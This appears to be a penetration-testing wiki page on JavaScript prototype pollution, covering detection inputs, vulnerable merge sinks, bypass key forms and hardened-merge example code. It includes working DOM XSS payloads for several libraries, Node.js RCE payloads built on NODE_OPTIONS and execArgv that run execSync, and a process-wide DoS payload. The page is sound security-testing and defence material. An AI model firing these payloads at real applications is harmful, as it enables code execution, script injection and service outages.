# Prototype Pollution

Prototype pollution is a JavaScript vulnerability in which attacker-controlled keys (typically `__proto__` or `constructor.prototype`) reach a merge, clone or path-set function and end up writing to `Object.prototype`, so every object in the runtime inherits the injected property. On its own this is usually a DoS; combined with a gadget (code that reads a property it never set itself) it becomes DOM XSS in the browser or RCE in Node.js.

## How It Works

```javascript
// JavaScript objects inherit from Object.prototype
let obj = {};
console.log(obj.toString); // inherited from Object.prototype

// Pollution occurs when attacker controls property assignment
obj.__proto__.polluted = "yes";
// OR
obj["__proto__"]["polluted"] = "yes";
// OR
obj.constructor.prototype.polluted = "yes";

// Now ALL objects have this property
let newObj = {};
console.log(newObj.polluted); // "yes"
```

## Detection

### Manual Testing

```javascript
// Example inputs. Which form lands depends on how the request is parsed:
// bracket/dot paths for qs-style query parsers, JSON for request bodies.

// Via URL query string
?__proto__[test]=polluted
?__proto__.test=polluted
?constructor[prototype][test]=polluted

// Via JSON body
{"__proto__": {"test": "polluted"}}
{"constructor": {"prototype": {"test": "polluted"}}}

// Verify pollution (browser console or Node REPL): a fresh object now inherits the key
Object.prototype.test === "polluted"
({}).test === "polluted"
```

### Automated Detection

```bash
# ppmap - scans URLs for client-side prototype pollution and known gadgets (reads URLs from stdin)
# https://github.com/kleiton0x00/ppmap
echo "https://target.com/" | ppmap

# PPScan - browser extension that flags pollutable pages while you browse
# https://github.com/msrkp/PPScan

# Burp Suite: "Server-Side Prototype Pollution Scanner" BApp (PortSwigger) for the server side,
# and DOM Invader's prototype pollution mode in Burp's embedded browser for the client side
# https://portswigger.net/bappstore/c1d4bd60626d4178a54d36ee802cf7e8
```

## Common Sinks (Client- and Server-Side)

```javascript
// Recursive merge / extend / clone and path-based set functions are the classic
// sinks: they walk attacker-controlled keys, including an own key literally
// named "__proto__" produced by JSON.parse or a bracket-notation query parser.

// Lodash (several CVEs across 4.17.x; use 4.17.21 or later)
_.merge({}, userInput);
_.defaultsDeep({}, userInput);
_.set({}, path, value);        // attacker-controlled path such as "__proto__.polluted"
_.setWith({}, path, value);

// jQuery deep extend (fixed in 3.4.0)
$.extend(true, {}, userInput);

// Deep merge libraries (deepmerge, merge-deep, ...; check the changelog for the fix)
deepmerge({}, userInput);

// NOT a sink for Object.prototype: Object.assign (and object spread) only copies
// own keys with plain assignment, so an own "__proto__" key just rewires the
// prototype link of the target object; Object.prototype itself is untouched.
Object.assign({}, userInput);
```

## Exploitation Payloads

### DOM XSS via Prototype Pollution

```javascript
// Every payload below needs a gadget: client code that reads a property the
// object never set (e.g. config.html) and passes it to a dangerous sink.

// innerHTML sink
?__proto__[innerHTML]=<img/src/onerror=alert(1)>

// iframe srcdoc
?__proto__[srcdoc]=<script>alert(1)</script>

// anchor href
?__proto__[href]=javascript:alert(1)
```

### Gadgets for Common Libraries

```javascript
// jQuery < 3.4.0 (CVE-2019-11358): deep $.extend is itself the sink
$.extend(true, {}, JSON.parse('{"__proto__": {"polluted": "yes"}}'));

// Lodash < 4.17.12 (CVE-2019-10744): _.defaultsDeep is the sink
_.defaultsDeep({}, JSON.parse('{"__proto__": {"polluted": "yes"}}'));

// Lodash _.template gadget (older 4.17.x): the sourceURL option is read through
// the prototype and appended to the generated code after "//# sourceURL=",
// so a line terminator breaks out of the comment
?__proto__[sourceURL]=%0aalert(1)//
_.template('', {variable: 'x'});

// Vue.js
?__proto__[v-if]=_c.constructor('alert(1)')()

// Handlebars
?__proto__[pendingContent]=<script>alert(1)</script>

// Pug/Jade
?__proto__[block]={"type":"Text","val":"<script>alert(1)</script>"}
```

### Server-Side Prototype Pollution (Node.js)

```javascript
// RCE via child_process (Linux; PortSwigger research). child_process builds the
// child's environment with for...in, so an inherited NODE_OPTIONS leaks into it;
// argv0 puts the JS payload at the start of /proc/self/cmdline, which
// --require then loads, and the trailing // comments out the real arguments.
{"__proto__": {
  "shell": "node",
  "NODE_OPTIONS": "--require /proc/self/cmdline",
  "argv0": "console.log(require('child_process').execSync('id').toString())//"
}}

// RCE via child_process.fork(): execArgv is read from the options object
{"__proto__": {"execArgv": ["--eval=require('child_process').execSync('id')"]}}

// DoS: every implicit string conversion in the process now throws TypeError
{"__proto__": {"toString": "not a function"}}
```

Before sending anything destructive, confirm pollution non-destructively: Express reads `json spaces` from a plain settings object, so a polluted `json spaces` only changes the indentation of JSON responses (PortSwigger's detection technique). The `toString` payload breaks string conversion for the whole process and cannot be undone by a follow-up request.
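The three server-side behaviours above, as an added example that is not code from the original page: why a polluted `Object.prototype` reaches a child process, a non-destructive probe modelled on an Express-style settings lookup, and the `toString` DoS. Nothing here spawns a process; `buildChildEnv` mimics the `for...in` loop `child_process` uses to flatten the environment, `renderJson` mimics `res.json()` reading `json spaces`, and `withPollution` always restores `Object.prototype`. All function names are chosen for this illustration.

```javascript
// Added example (not from the original page). No process is spawned;
// buildChildEnv/renderJson are models of Node's and Express's behaviour.

// How the child's environment is assembled: for...in also visits inherited
// enumerable keys, so Object.prototype.NODE_OPTIONS ends up in the child env.
function buildChildEnv(env) {
  const pairs = [];
  for (const key in env) pairs.push(`${key}=${env[key]}`);
  return pairs;
}

// Hardened variant: own keys only.
function buildChildEnvSafe(env) {
  return Object.keys(env).map((key) => `${key}=${env[key]}`);
}

// Express keeps app settings in a plain object and reads them by name, so an
// inherited "json spaces" re-indents res.json() output without breaking anything.
function renderJson(settings, body) {
  return JSON.stringify(body, null, settings['json spaces']);
}

// Run fn with Object.prototype[name] polluted, then restore the original state
// (restoring matters for toString, which already exists on Object.prototype).
function withPollution(name, value, fn) {
  const hadOwn = Object.prototype.hasOwnProperty.call(Object.prototype, name);
  const saved = Object.prototype[name];
  Object.prototype[name] = value;
  try {
    return fn();
  } finally {
    if (hadOwn) Object.prototype[name] = saved; else delete Object.prototype[name];
  }
}

// 1. Inherited NODE_OPTIONS leaks into a for...in-built env, not into an Object.keys one.
function envLeak() {
  const env = { PATH: '/usr/bin' }; // constructed env, not process.env
  return withPollution('NODE_OPTIONS', '--require /proc/self/cmdline', () => ({
    vulnerable: buildChildEnv(env),
    hardened: buildChildEnvSafe(env),
  }));
}

// 2. Non-destructive probe: JSON output changes shape, nothing else does.
function jsonSpacesProbe() {
  const settings = { env: 'production' }; // constructed settings object
  return {
    before: renderJson(settings, { ok: true }),
    during: withPollution('json spaces', 4, () => renderJson(settings, { ok: true })),
  };
}

// 3. DoS: with toString replaced by a string, ToPrimitive finds no callable
//    converter and every implicit string conversion throws.
function toStringDos() {
  return withPollution('toString', 'not a function', () => {
    try { return '' + {}; } catch (e) { return e.name; }
  });
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(envLeak());
  console.log(jsonSpacesProbe());
  console.log(toStringDos());
}
```

The `json spaces` probe is the one to run first against a live target: a response whose JSON suddenly gains four-space indentation confirms server-side pollution without taking the application down.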

## Bypass Techniques

```javascript
// Alternative property paths (all end at Object.prototype)
constructor.prototype.polluted=1
constructor[prototype][polluted]=1
__proto__.polluted=1
__proto__[polluted]=1

// JSON unicode escapes: JSON.parse decodes the key to "__proto__", so this only
// gets past filters that inspect the raw body before parsing
{"\u005f\u005fproto\u005f\u005f": {"polluted": 1}}

// Mixed case only works if the application lower-cases keys before merging;
// JavaScript property names are case-sensitive
__PROTO__

// Array payloads pollute Array.prototype, not Object.prototype, so only arrays
// (and objects inheriting from them) pick up the property
[].__proto__.polluted=1
```
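The manual-testing inputs, the merge sinks and the bypass key forms above, worked through in one added example that is not code from the original page: a bracket-notation query parser and a recursive merge of the kind found in vulnerable libraries, shown beside a hardened merge, fed with constructed JSON bodies (plain, `constructor.prototype` and `\u005f`-escaped keys) and query strings. `parseQuery`, `unsafeMerge`, `safeMerge`, `isPolluted`, `probe` and `runProbes` are names chosen for this illustration, not any library's API.

```javascript
// Added example (not from the original page). Every probe undoes its own
// pollution so the rest of the process is unaffected.

function isObjectLike(v) {
  // Functions count too, so that source.constructor meets target.constructor
  // (the Object function) and the walk continues into its .prototype.
  return v !== null && (typeof v === 'object' || typeof v === 'function');
}

// VULNERABLE: for...in walks every enumerable key of `source`, including an
// own key literally named "__proto__" (JSON.parse creates one), and then
// recurses into target["__proto__"], which is Object.prototype itself.
function unsafeMerge(target, source) {
  for (const key in source) {
    const val = source[key];
    if (isObjectLike(val)) {
      if (!isObjectLike(target[key])) target[key] = {};
      unsafeMerge(target[key], val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// HARDENED: own keys only, the three dangerous keys skipped, and an existing
// target slot reused only when it is an own plain object.
const FORBIDDEN = new Set(['__proto__', 'constructor', 'prototype']);
function safeMerge(target, source) {
  for (const key of Object.keys(source)) {
    if (FORBIDDEN.has(key)) continue;
    const val = source[key];
    if (val !== null && typeof val === 'object') {
      const own = Object.prototype.hasOwnProperty.call(target, key) ? target[key] : undefined;
      const dest = own !== null && typeof own === 'object' ? own : {};
      target[key] = safeMerge(dest, val);
    } else {
      target[key] = val;
    }
  }
  return target;
}

// Naive "a[b][c]=1" / "a.b.c=1" query parser. Nested objects are created with
// Object.defineProperty so a "__proto__" segment becomes an own data property
// of the result (what JSON.parse does for a JSON body) instead of triggering
// the __proto__ setter and rewiring the result's prototype link.
function parseQuery(qs) {
  const define = (o, k, v) =>
    Object.defineProperty(o, k, { value: v, enumerable: true, writable: true, configurable: true });
  const out = {};
  for (const pair of qs.replace(/^\?/, '').split('&')) {
    if (!pair) continue;
    const eq = pair.indexOf('=');
    const key = decodeURIComponent(eq < 0 ? pair : pair.slice(0, eq));
    const val = eq < 0 ? '' : decodeURIComponent(pair.slice(eq + 1));
    const path = key.split(/\]\[|\[|\]|\./).filter(Boolean);
    let cur = out;
    for (const seg of path.slice(0, -1)) {
      if (!Object.prototype.hasOwnProperty.call(cur, seg)) define(cur, seg, {});
      cur = cur[seg];
    }
    define(cur, path[path.length - 1], val);
  }
  return out;
}

// A fresh object inherits the key once Object.prototype carries it.
function isPolluted(name) {
  return Object.prototype.hasOwnProperty.call(Object.prototype, name) && ({})[name] !== undefined;
}

// Merge the payload into an empty object with mergeFn, report whether
// Object.prototype was hit, then remove the injected property.
function probe(mergeFn, payload, name) {
  mergeFn({}, payload);
  const hit = isPolluted(name);
  delete Object.prototype[name];
  return hit;
}

// Constructed sample inputs: JSON bodies (including the \u005f-escaped key,
// which JSON.parse decodes to "__proto__") and bracket-notation query strings.
function runProbes() {
  const cases = [
    ['json __proto__', () => JSON.parse('{"__proto__": {"p1": "polluted"}}'), 'p1'],
    ['json constructor.prototype', () => JSON.parse('{"constructor": {"prototype": {"p2": "polluted"}}}'), 'p2'],
    ['json unicode-escaped key', () => JSON.parse('{"\\u005f\\u005fproto\\u005f\\u005f": {"p3": "polluted"}}'), 'p3'],
    ['query __proto__[k]', () => parseQuery('?__proto__[p4]=polluted'), 'p4'],
    ['query constructor[prototype][k]', () => parseQuery('?constructor[prototype][p5]=polluted'), 'p5'],
  ];
  const results = {};
  for (const [label, build, name] of cases) {
    results[label] = { unsafe: probe(unsafeMerge, build(), name), safe: probe(safeMerge, build(), name) };
  }
  return results;
}

if (typeof require !== 'undefined' && require.main === module) console.table(runProbes());
```

Running it prints a table with `unsafe: true` and `safe: false` for every input. The lesson for a fix is in `safeMerge`: iterate own keys only, refuse `__proto__`, `constructor` and `prototype`, and never descend into a target slot you did not create; `Object.create(null)` for config objects and `Object.freeze(Object.prototype)` are additional defence-in-depth options.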

## Tools & Resources

```bash
# Scanning
https://github.com/kleiton0x00/ppmap
https://github.com/msrkp/PPScan

# Gadget database (client-side gadgets per library, with payloads)
https://github.com/BlackFan/client-side-prototype-pollution

# Burp Extension (Server-Side Prototype Pollution Scanner)
https://portswigger.net/bappstore/c1d4bd60626d4178a54d36ee802cf7e8

# Research: "Server-side prototype pollution: Black-box detection without the DoS" (PortSwigger)
https://portswigger.net/research/server-side-prototype-pollution
```

## Related Topics

* [XSS](/enumeration/web/xss.md) - Prototype pollution often chains to XSS
* [Deserialization](/enumeration/web/deserialization.md) - Similar object manipulation concepts
* [SSTI](/enumeration/web/ssti.md) - Template engines can be affected

